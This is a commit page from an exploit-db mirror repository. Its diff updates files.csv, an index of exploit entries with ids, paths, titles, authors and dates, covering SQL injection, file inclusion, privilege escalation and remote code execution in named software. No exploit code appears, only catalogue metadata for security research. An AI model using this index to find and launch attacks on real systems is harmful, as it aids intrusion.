bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-16

Browse source 
5 new exploits

HydraIrc 0.3.164 - (last) Remote Denial of Service
Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow (PoC)
HydraIrc 0.3.164 - Remote Denial of Service
Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)
Microsoft Internet Explorer 9 MSHTML - CMarkup::Reload­In­Compat­View Use-After-Free
Microsoft Internet Explorer 9 IEFRAME - CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)

Nidesoft MP3 Converter 2.6.18 - SEH Local Buffer Overflow

Nagios Core < 4.2.4 - Privilege Escalation

Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution

Quicksilver Forums 1.2.1 - (set) Remote File Inclusion
Quicksilver Forums 1.2.1 - Remote File Inclusion

e-Vision CMS 2.0 - (all_users.php) SQL Injection
e-Vision CMS 2.0 - 'all_users.php' SQL Injection

LetterIt 2.0 - (inc/session.php) Remote File Inclusion
LetterIt 2.0 - 'session.php' Remote File Inclusion

e107 0.7.8 - (mailout.php) Access Escalation Exploit (Admin needed)
e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)

PHPMyRealty 1.0.x - (search.php type) SQL Injection
PHPMyRealty 1.0.x - 'search.php' SQL Injection

pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection
LetterIt 2 - 'Language' Local File Inclusion
phpMyRealty - (location) SQL Injection
LetterIt 2 - 'Language' Parameter Local File Inclusion
phpMyRealty 2.0.0 - 'location' Parameter SQL Injection
ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion
E-topbiz Dating 3 PHP Script - (mail_id) SQL Injection
Scripts24 iTGP 1.0.4 - 'id' SQL Injection
Scripts24 iPost 1.0.1 - 'id' SQL Injection
eStoreAff 0.1 - 'cid' SQL Injection
GreenCart PHP Shopping Cart - 'id' SQL Injection
ABG Blocking Script 1.0a - 'abg_path' Parameter Remote File Inclusion
E-topbiz Dating 3 PHP Script - 'mail_id' Parameter SQL Injection
Scripts24 iTGP 1.0.4 - 'id' Parameter SQL Injection
Scripts24 iPost 1.0.1 - 'id' Parameter SQL Injection
eStoreAff 0.1 - 'cid' Parameter SQL Injection
GreenCart PHP Shopping Cart - 'id' Parameter SQL Injection

e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities
e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering

E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection
E-Store Kit-1 <= 2 PayPal Edition - 'pid' Parameter SQL Injection

iges CMS 2.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
iges CMS 2.0 - Cross-Site Scripting / SQL Injection

Multiple Wsn Products - (Local File Inclusion) Code Execution
Multiple Wsn Products - Local File Inclusion / Code Execution
Discuz! 6.0.1 - (searchid) SQL Injection
pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities
Discuz! 6.0.1 - 'searchid' Parameter SQL Injection
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
Vacation Rental Script 3.0 - 'id' SQL Injection
Quicksilver Forums 1.4.1 - forums[] SQL Injection
txtSQL 2.2 Final - (startup.php) Remote File Inclusion
Vacation Rental Script 3.0 - 'id' Parameter SQL Injection
Quicksilver Forums 1.4.1 - SQL Injection
txtSQL 2.2 Final - 'startup.php' Remote File Inclusion
OpenImpro 1.1 - (image.php id) SQL Injection
ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection
pPIM 1.0 - (upload/change Password) Multiple Vulnerabilities
Ovidentia 6.6.5 - (item) SQL Injection
BBlog 0.7.6 - (mod) SQL Injection
OpenImpro 1.1 - 'image.php' SQL Injection
ZeeBuddy 2.1 - 'adid' Parameter SQL Injection
pPIM 1.0 - upload/change Password
Ovidentia 6.6.5 - 'item' Parameter SQL Injection
BBlog 0.7.6 - 'mod' Parameter SQL Injection

pPIM 1.01 - (notes.php id) Local File Inclusion
pPIM 1.01 - 'notes.php' Local File Inclusion

e107 plugin fm pro 1 - (File Disclosure / Arbitrary File Upload / Directory Traversal) Multiple Vulnerabilities
e107 plugin fm pro 1 - File Disclosure / Arbitrary File Upload / Directory Traversal

Coppermine Photo Gallery 1.4.19 - Remote Arbitrary .PHP File Upload
Coppermine Photo Gallery 1.4.19 - Remote File Upload

pPIM 1.01 - (notes.php id) Remote Command Execution
pPIM 1.01 - 'notes.php' Remote Command Execution

moziloCMS 1.11 - (Local File Inclusion / Full Path Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting

Joomla! Component 'com_agenda' 1.0.1 - 'id' Parameter SQL Injection
Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection

Joomla! Component 'com_alphauserpoints' 1.5.5 - Local File Inclusion
Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion

Joomla! Component 'com_arcadegames' - Local File Inclusion
Joomla! Component Arcade Games 1.0 - Local File Inclusion
Joomla! Component 'com_AddressBook' - Local File Inclusion
Joomla! Component 'com_advertising' - Local File Inclusion
Joomla! Component Address Book 1.5.0 - Local File Inclusion
Joomla! Component Advertising 0.25 - Local File Inclusion
Joomla! Component 'com_blogfactory' - Local File Inclusion
Joomla! Component 'com_beeheard' - Local File Inclusion
Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
Joomla! Component BeeHeard 1.0 - Local File Inclusion

Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion
Joomla! Component Archery Scores 1.0.6 - Local File Inclusion

Joomla! Component 'com_abc' - SQL Injection
Joomla! Component ABC 1.1.7 - SQL Injection

Joomla! Component 'com_bfquiztrial' - SQL Injection (1)
Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)

Joomla! Component 'com_bfquiztrial' - SQL Injection (2)
Joomla! Component BF Quiz 1.0 - SQL Injection (2)

e107 0.7.21 full - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting

Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting
Joomla! Component JE Awd Song - Persistent Cross-Site Scripting

Joomla! Component 'com_addressbook' - Blind SQL Injection
Joomla! Component Address Book - Blind SQL Injection

Joomla! Component 'com_autartimonial' - SQL Injection
Joomla! Component AutarTimonial 1.0.8 - SQL Injection

Joomla! Component 'com_artforms' 2.1b7.2 rc2 - Multiple Vulnerabilities
Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities

Joomla! Component 'com_camelcitydb2' 2.2 - SQL Injection
Joomla! Component CamelcityDB 2.2 - SQL Injection

Joomla! Component 'com_amblog' 1.0 - Multiple SQL Injections
Joomla! Component Amblog 1.0 - Multiple SQL Injections

Joomla! Component 'com_aardvertiser' 2.1 - Blind SQL Injection
Joomla! Component Aardvertiser 2.1 - Blind SQL Injection

Joomla! Component 'com_cbe' - Local File Inclusion / Remote Code Execution
Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution

Joomla! Component 'com_allcinevid' 1.0.0 - Blind SQL Injection
Joomla! Component allCineVid 1.0.0 - Blind SQL Injection

Joomla! Component 'com_alameda' 1.0 - SQL Injection
Joomla! Component Alameda 1.0 - SQL Injection

Free Hosting Manager 2.0 - (packages.php id Parameter) SQL Injection
Free Hosting Manager 2.0 - 'id' Parameter SQL Injection
Coppermine Photo Gallery 1.x - menu.inc.php CPG_URL Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.x - modules.php startdir Parameter Traversal Arbitrary File Access
Coppermine Photo Gallery 1.x - init.inc.php Remote File Inclusion
Coppermine Photo Gallery 1.x - theme.php Multiple Parameter Remote File Inclusion
Coppermine Photo Gallery 1.2.2b - 'menu.inc.php' Cross-Site Scripting
Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Parameter Traversal Arbitrary File Access
Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion
Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion

BBlog 0.7.4 - PostID Parameter SQL Injection
BBlog 0.7.4 - 'PostID' Parameter SQL Injection

Coppermine Photo Gallery 1.x - Albmgr.php SQL Injection
Coppermine Photo Gallery 1.4.11 - SQL Injection
LoveCMS 1.4 - install/index.php step Parameter Remote File Inclusion
LoveCMS 1.4 - install/index.php step Parameter Traversal Arbitrary File Access
LoveCMS 1.4 - 'index.php' load Parameter Traversal Arbitrary File Access
LoveCMS 1.4 - 'index.php' id Parameter Cross-Site Scripting
LoveCMS 1.4 - 'step' Parameter Remote File Inclusion
LoveCMS 1.4 - 'step' Parameter Traversal Arbitrary File Access
LoveCMS 1.4 - 'load' Parameter Traversal Arbitrary File Access
LoveCMS 1.4 - 'id' Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.4.x - mode.php referer Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.4.x - viewlog.php log Parameter Local File Inclusion
Coppermine Photo Gallery 1.4.12 - 'referer' Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.4.12 - 'log' Parameter Local File Inclusion

Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection
Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection

Joomla! / Mambo Component 'com_lms' - 'cat' Parameter SQL Injection
Joomla! / Mambo Component Showroom Joomlearn LMS - 'cat' Parameter SQL Injection
Blog Manager - inc_webblogmanager.asp ItemID Parameter SQL Injection
Blog Manager - inc_webblogmanager.asp categoryId Parameter Cross-Site Scripting
Blog Manager - 'ItemID' Parameter SQL Injection
Blog Manager - 'categoryId' Parameter Cross-Site Scripting

e107 0.7.x - (CAPTCHA Security Bypass / Cross-Site Scripting) Multiple Vulnerabilities
e107 0.7.x - CAPTCHA Security Bypass / Cross-Site Scripting

Joomla! Component 'com_canteen' 1.0 - Local File Inclusion
Joomla! Component Canteen 1.0 - Local File Inclusion
Coppermine Photo Gallery 1.5.10 - help.php Multiple Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter Cross-Site Scripting
Coppermine Photo Gallery 1.5.10 - 'help.php' Cross-Site Scripting
Coppermine Photo Gallery 1.5.10 - 'searchnew.php' Cross-Site Scripting
This commit is contained in:
Offensive Security 2016-12-16 05:01:19 +00:00
parent 32e86030d5
commit 24bf161ca6
6 changed files with 1372 additions and 78 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

161
files.csv
View file

@ -760,8 +760,8 @@ id,file,description,date,author,platform,type,port
6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0
6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0
6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service",2008-08-03,crit3rion,hardware,dos,0
6201,platforms/windows/dos/6201.html,"HydraIrc 0.3.164 - (last) Remote Denial of Service",2008-08-04,securfrog,windows,dos,0
6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos,0
6201,platforms/windows/dos/6201.html,"HydraIrc 0.3.164 - Remote Denial of Service",2008-08-04,securfrog,windows,dos,0
6216,platforms/windows/dos/6216.html,"Download Accelerator Plus DAP 8.6 - 'AniGIF.ocx' Buffer Overflow (PoC)",2008-08-10,"Guido Landi",windows,dos,0
6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0
6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos,0
6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié",multiple,dos,0
@ -5309,6 +5309,8 @@ id,file,description,date,author,platform,type,port
40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0
40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0
40915,platforms/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos,0
40922,platforms/windows/dos/40922.html,"Microsoft Internet Explorer 9 MSHTML - CMarkup::Reload­In­Compat­View Use-After-Free",2016-12-15,Skylined,windows,dos,0
40923,platforms/windows/dos/40923.html,"Microsoft Internet Explorer 9 IEFRAME - CMarkup::Remove­Pointer­Pos Use-After-Free (MS13-055)",2016-12-15,Skylined,windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8222,6 +8224,7 @@ id,file,description,date,author,platform,type,port
34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0
34167,platforms/win_x86/local/34167.rb,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit)",2014-07-25,Metasploit,win_x86,local,0
34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation",2010-07-07,"Bartlomiej Balcerek",linux,local,0
40917,platforms/windows/local/40917.py,"Nidesoft MP3 Converter 2.6.18 - SEH Local Buffer Overflow",2016-12-15,malwrforensics,windows,local,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation",2014-08-05,"ryujin & sickness",windows,local,0
34311,platforms/solaris/local/34311.sh,"Oracle Solaris 8/9/10 - 'flar' Insecure Temporary File Creation",2010-07-12,"Frank Stuart",solaris,local,0
34313,platforms/solaris/local/34313.txt,"Oracle Solaris - 'nfslogd' Insecure Temporary File Creation",2010-07-13,"Frank Stuart",solaris,local,0
@ -8702,6 +8705,7 @@ id,file,description,date,author,platform,type,port
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
40921,platforms/linux/local/40921.py,"Nagios Core < 4.2.4 - Privilege Escalation",2016-12-15,"Dawid Golunski",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15158,6 +15162,7 @@ id,file,description,date,author,platform,type,port
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
40920,platforms/linux/remote/40920.py,"Nagios Core < 4.2.2 - Curl Command Injection / Remote Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16566,7 +16571,7 @@ id,file,description,date,author,platform,type,port
2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0
2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0
2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0
2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - Remote File Inclusion",2006-09-13,mdx,php,webapps,0
2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0
2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0
2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0
@ -16620,7 +16625,7 @@ id,file,description,date,author,platform,type,port
2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution",2006-09-22,rgod,php,webapps,0
2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - (kategori.asp) SQL Injection",2006-09-22,Muhacir,asp,webapps,0
2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0
2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0
2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - 'all_users.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0
2419,platforms/php/webapps/2419.txt,"Web-News 1.6.3 - (template.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0
2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0
2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0
@ -16876,7 +16881,7 @@ id,file,description,date,author,platform,type,port
2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0
2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - (inc/irayofuncs.php) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0
2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0
2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0
2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0
2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0
2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - (MoreInfo.asp) SQL Injection",2006-11-09,ajann,asp,webapps,0
2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - (language.inc.php) Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0
@ -17490,7 +17495,7 @@ id,file,description,date,author,platform,type,port
3717,platforms/php/webapps/3717.txt,"WebKalk2 1.9.0 - 'absolute_path' Remote File Inclusion",2007-04-12,GoLd_M,php,webapps,0
3718,platforms/php/webapps/3718.txt,"RicarGBooK 1.2.1 - 'lang' Parameter Local File Inclusion",2007-04-12,Dj7xpl,php,webapps,0
3719,platforms/php/webapps/3719.pl,"MyBulletinBoard (MyBB) 1.2.2 - 'CLIENT-IP' SQL Injection",2007-04-12,Elekt,php,webapps,0
3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - (mailout.php) Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0
3721,platforms/php/webapps/3721.pl,"e107 0.7.8 - 'mailout.php' Access Escalation Exploit (Admin needed)",2007-04-12,Gammarays,php,webapps,0
3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0
3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0
3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0
@ -18119,7 +18124,7 @@ id,file,description,date,author,platform,type,port
4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0
4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps,0
4743,platforms/php/webapps/4743.pl,"FreeWebShop 2.2.7 - 'cookie' Admin Password Grabber Exploit",2007-12-18,k1tk4t,php,webapps,0
4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0
4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - 'search.php' SQL Injection",2007-12-18,Koller,php,webapps,0
4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
@ -19231,49 +19236,49 @@ id,file,description,date,author,platform,type,port
6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0
6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
6173,platforms/php/webapps/6173.txt,"Pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Local File Inclusion",2008-07-31,NoGe,php,webapps,0
6180,platforms/php/webapps/6180.txt,"phpMyRealty - (location) SQL Injection",2008-08-01,CraCkEr,php,webapps,0
6179,platforms/php/webapps/6179.txt,"LetterIt 2 - 'Language' Parameter Local File Inclusion",2008-07-31,NoGe,php,webapps,0
6180,platforms/php/webapps/6180.txt,"phpMyRealty 2.0.0 - 'location' Parameter SQL Injection",2008-08-01,CraCkEr,php,webapps,0
6182,platforms/php/webapps/6182.txt,"phpAuction GPL Enhanced 2.51 - 'profile.php' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0
6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - (mail_id) SQL Injection",2008-08-01,Corwin,php,webapps,0
6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a - 'abg_path' Parameter Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0
6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script - 'mail_id' Parameter SQL Injection",2008-08-01,Corwin,php,webapps,0
6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' Parameter SQL Injection",2008-08-01,Mr.SQL,php,webapps,0
6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' Parameter SQL Injection",2008-08-01,"Hussin X",php,webapps,0
6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - SQL Injection / Arbitrary File Upload / Information Gathering",2008-08-02,"Khashayar Fereidani",php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' Parameter SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0
6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 - 'index.php' Local File Inclusion",2008-08-03,SirGod,php,webapps,0
6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion",2008-08-04,"Virangar Security",php,webapps,0
6204,platforms/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0
6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0
6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - Cross-Site Scripting / SQL Injection",2008-08-05,BugReport.IR,php,webapps,0
6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0
6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' Parameter SQL Injection",2008-08-05,Stack,php,webapps,0
6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (Local File Inclusion) Code Execution",2008-08-06,otmorozok428,php,webapps,0
6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps,0
6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0
6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0
6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0
